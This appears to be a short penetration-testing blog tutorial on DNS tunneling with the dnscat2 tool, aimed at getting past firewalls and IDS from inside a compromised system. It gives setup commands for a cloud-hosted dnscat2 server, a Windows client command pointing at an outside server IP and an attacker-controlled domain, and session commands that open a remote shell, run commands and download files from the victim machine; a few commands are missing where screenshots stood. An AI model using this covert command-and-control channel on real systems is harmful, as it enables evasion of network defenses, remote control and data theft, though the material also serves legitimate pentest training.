One of the challenges of a pentester is to communicate through firewalls and IDS from inside a system. DNS Tunneling is a very effective technique for overcoming this kind of protection mechanisms. Dnscat2 is a very popular tool for DNS Tunneling.
You can install your dnscat2 server on your own machine or on a machine in the cloud. You can hire a virtual server on Digital Ocean and create an Ubuntu droplet there (You’ll receive root password for your droplet machine over e-mail). After that you can connect your machine over ssh.
To install dnscat2 server there run the following commands:
# apt-get update # apt-get -y install ruby-dev git make g++ # gem install bundler # git clone https://github.com/iagox86/dnscat2.git # cd dnscat2/server # bundle install
If you’ll face problems when running the command “bundle install” run the following commands and then install the missing libraries.
gem install rubygems-update
On client machine (here Windows client) you can install the dnscat2 client (dnscat2-v0.05-client-win32.zip) from the developer’s website.
Now, you can start dnscat2 server with the following command:
After that, when you execute your dnscat2.exe on your Windows machine with the following command;
dnscat2.exe –dns server=126.96.36.199,port=53
then you’ll get a shell. Just type:
session -i 1
You’ll get calculator.exe running on Windows machine. And all this TCP traffic is encapsulated within UDP 53 traffic.
A better way of running dnscat2 server is defining a legitimate domain name with the IP address of dnscat2 as its authoritive name server. For this purpose I used makarillo.com and defined 188.8.131.52 IP address as its name server.
After that it is possible to run dnscat2 server with this domain name as parameter:
ruby ./dnscat2.rb makarillo.com,server=184.108.40.206,port=53
Now, all you have to do on client side is again running the tool with the same domain name:
You’ll have now have a command shell over the client machine. You can see what is inside that directory and then download the files as you wish:
dnscat2 session -i 1
command (Lab) 1>exec “cmd /c dir>output.txt”
command (Lab) 1>download output.txt
Below you can see snapshots of both the server and client side of the dnscat2 tool running:
First client side:
And server side running:
Keep on digging the rabbit hole :)